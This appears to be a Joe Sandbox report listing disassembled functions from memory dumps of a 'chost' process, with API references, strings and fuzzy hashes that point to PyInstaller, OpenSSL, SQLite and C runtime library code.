Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: out of memory$string or blob too big
API String ID: 2636501453-2410398255
Opcode ID: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
Instruction ID: eaa1a2742c6fe2d072a9e31cf7c320967f0a685242a4cfa1de914d262c3a5d09
Opcode Fuzzy Hash: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
Instruction Fuzzy Hash: 2361036AB0865282E7108B26E1606FE6770FF45B98F148032EF6D87BD9CF3CE411A700

Function 00007FF69436EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF69436EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF69436EFF3

Strings

RCC, xrefs: 00007FF69436EFC3
MOC, xrefs: 00007FF69436EFBB

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: a931f90d961dafcbe0b4b99237eddf6433d600b5eb2293fceafd16cb6f40851d
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 48617332908BC685D7709F26E4823AAB7A0FB857D4F048269EB9D47B55DF7CD194CB00

Function 00007FF69436F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF69436F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF69436F408

Strings

csm, xrefs: 00007FF69436F45A
csm, xrefs: 00007FF69436F342

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: a6280de1c0bab613fee23de0b9244be09294a148c034884cb2768bd479b885f6
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 6D51603290828386EB748E37908636877A1FB55B94F249279DA5D87B99CF3CE850CB05

Function 00007FFDF6A419DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A821AB
00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A821ED
00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A8222F

Strings

..\s\ssl\tls_srp.c, xrefs: 00007FFDF6A8229E, 00007FFDF6A822B0

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c
API String ID: 3568877910-1778748169
Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction ID: d818a32843ff47e358ca3fd359a2c83f7b507317608d08e6560e6665b705334f
Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction Fuzzy Hash: B2413F21B1AA8380FB54AB619570BB83298EF41F98F188634DE7D0BFCDDF3CA4018650

Function 00007FF694367E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF69436352C,?,00000000,00007FF694363F23), ref: 00007FF694367F22

Strings

\, xrefs: 00007FF694367E87
%.*s, xrefs: 00007FF694367EDB
%s%c, xrefs: 00007FF694367E94

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction ID: c785f8d82bda67997179227cf3433a2a6e8fb5056e6c619aa0187108888648f2
Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction Fuzzy Hash: 7931D421619AC245EA319B32E8917AA7354EF84BE4F448279EE6DC77C9EF2CD605C700

Function 00007FF694362810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6943628EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF694362868
Error, xrefs: 00007FF6943628DD
ERROR, xrefs: 00007FF69436286F

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: fffc2b012b497ff34626e6a0aed64a935c2a092e32d121183facd13d28b4fabf
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: C921A372708B4291E7209B26F8857EA73A4EB88780F40813AEA8DD3756DE3CD649C700

Function 00007FF69437C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF69437C68F
WriteFile.KERNEL32 ref: 00007FF69437C957
WriteFile.KERNEL32 ref: 00007FF69437C99D
GetLastError.KERNEL32 ref: 00007FF69437CA53

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: abd8ef16a9b81290618f77638e7ac576d5da9cce812b5851d7f73eb9d09b65d0
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: 90D1E272B18A81CAE760CF76D4902AC37B1FB44798B44C279DE9E97B99DE38D006C740

Function 00007FF69437CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69437CFBB), ref: 00007FF69437D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69437CFBB), ref: 00007FF69437D177

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 2e69c92b5fee76b3c9db045bb972130a1e9932fa3c44fae0c288559885190782
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: CE919132E2C652C5F7709F7694C02BD2BA0EB44B98F14817DDE8EA7A85DE38D442C700

Function 00007FF6943620C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6943620F4
SetWindowLongPtrW.USER32 ref: 00007FF694362116
GetWindowLongPtrW.USER32 ref: 00007FF694362140
InvalidateRect.USER32 ref: 00007FF694362160

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 63d83a58b65f6a7f80efd341cc31b7d7991bd07e953fad8e29ae40335f5b7c24
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 4711E921A0C14782F66497BBE5C62796251EB88780F95C078EF5987B9ACD2DD491C600

Function 00007FFDEAE42BEC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDEAE42C18
GetCurrentThreadId.KERNEL32 ref: 00007FFDEAE42C26
GetCurrentProcessId.KERNEL32 ref: 00007FFDEAE42C32
QueryPerformanceCounter.KERNEL32 ref: 00007FFDEAE42C42

Memory Dump Source

Source File: 00000011.00000002.2378252189.00007FFDEAE41000.00000040.00000001.01000000.00000022.sdmp, Offset: 00007FFDEAE40000, based on PE: true

Associated: 00000011.00000002.2378210021.00007FFDEAE40000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEA2000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEEE000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEF2000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEF7000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF54000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF57000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378628612.00007FFDEAF58000.00000080.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378672916.00007FFDEAF59000.00000004.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdeae40000_chost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
Instruction ID: e0adb3e85cabbb1082b5491e64f3889f6083901f9efc2b0f53a6668c389fd8f9
Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
Instruction Fuzzy Hash: 5A112126B15F0389EB04DF60E8643B933A4F719B58F441E31EA5D46764EF78D5548381

Function 00007FF69436D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF69436D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF69436D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF69436D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF69436D0D6

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: 503c07c0820b53d4637b48a728f68b3aaecd8a7943a55627700934a713639fd3
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 80111F26B14B06CAEB10CB72E8952B933A4F719758F440E35EA6D867A4EF78D154C340

Function 00007FFDF6ABECE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDF6ABED0C
GetCurrentThreadId.KERNEL32 ref: 00007FFDF6ABED1A
GetCurrentProcessId.KERNEL32 ref: 00007FFDF6ABED26
QueryPerformanceCounter.KERNEL32 ref: 00007FFDF6ABED36

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction ID: ef7c9747639f95529ba8e3ed77ae06a0c362cbff4247b0c6534510c211dc5778
Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction Fuzzy Hash: 3B113332B15F4189EB00CF70E8646B833B8F759758F440E31DA6D86B98EF78D5588340

Function 00007FFDF6A41A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF6A50C5B

Strings

d2i_SSL_SESSION, xrefs: 00007FFDF6A50AC2, 00007FFDF6A50B47, 00007FFDF6A50B88, 00007FFDF6A50DA2
..\s\ssl\ssl_asn1.c, xrefs: 00007FFDF6A50ACE, 00007FFDF6A50B53, 00007FFDF6A50B94, 00007FFDF6A50D34, 00007FFDF6A50DAE, 00007FFDF6A50DFA, 00007FFDF6A50E6F

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
API String ID: 3568877910-384499812
Opcode ID: 55e1937c5e44d1fa6eb7639b4386b7cde31f3b10beb005c0ec3602d9af263100
Instruction ID: e0fc461cddf30f9ff2c91171711ba0712cf528a8f335ade5d138ee429ac731e1
Opcode Fuzzy Hash: 55e1937c5e44d1fa6eb7639b4386b7cde31f3b10beb005c0ec3602d9af263100
Instruction Fuzzy Hash: F7D15E32B08B8282EB55DF25D5A0AB833A8FB45B44F484035DE6D47BD9EF38E960C310

Function 00007FFDF6A42126 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 268COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF6A6F76D

Strings

ssl_get_prev_session, xrefs: 00007FFDF6A6F732, 00007FFDF6A6F7D4, 00007FFDF6A6F884
..\s\ssl\ssl_sess.c, xrefs: 00007FFDF6A6F73E, 00007FFDF6A6F7E0, 00007FFDF6A6F890

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
API String ID: 3568877910-1331951588
Opcode ID: 255756c35d00e9a0da72a34b4993913d5a5468d22542b83d5da4e1e20c485908
Instruction ID: a8a2bdc4c7666ae0ba4389d6ba07a9b58777b269ab6009c72710387bd7765516
Opcode Fuzzy Hash: 255756c35d00e9a0da72a34b4993913d5a5468d22542b83d5da4e1e20c485908
Instruction Fuzzy Hash: ADC19F36B0868682E7559B26D560BB97369FB84B88F044131DF6D47BEACF3EE451C700

Function 00007FFDF70C06B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70C0852
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70C086B

Strings

string or blob too big, xrefs: 00007FFDF70C097D

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: string or blob too big
API String ID: 2636501453-2803948771
Opcode ID: defa5a02923370369b9de52485ae0b8c7a42c531ab77cdfb156cd6adcff6b966
Instruction ID: b4c9c60c6e0d584c711ca9e17ae823441c9f2bcddcb9bcaae0cd4650972b2cdf
Opcode Fuzzy Hash: defa5a02923370369b9de52485ae0b8c7a42c531ab77cdfb156cd6adcff6b966
Instruction Fuzzy Hash: E991682AF0920285FB68DB159965BF926B0EF40B84F084235DE6D823D9DF2DE449E748

Function 00007FFDF70ED7E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDF70EDA8A,?,?,?,00007FFDF70EDE4B), ref: 00007FFDF70ED9F7

Strings

CRE, xrefs: 00007FFDF70ED93F
INS, xrefs: 00007FFDF70ED959

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: CRE$INS
API String ID: 2636501453-4116259516
Opcode ID: dc797912a9dd998a2f9e1b3e17851358f1a3a2f9703f0521fb270c7deed9757b
Instruction ID: 7ffb0977f786cf37c8b032a6a3333f69d3dcd13b02600ccd3ac3445fec487622
Opcode Fuzzy Hash: dc797912a9dd998a2f9e1b3e17851358f1a3a2f9703f0521fb270c7deed9757b
Instruction Fuzzy Hash: 4A51A02AB0964281EB649B169870AF963B1EF80FC4F588135DD6DCB7DDDE3CE805A300

Function 00007FFDF6A41EBF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF6A49154

Strings

..\s\ssl\d1_srtp.c, xrefs: 00007FFDF6A4908B, 00007FFDF6A49183
ssl_ctx_make_profiles, xrefs: 00007FFDF6A4907F, 00007FFDF6A4917A

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
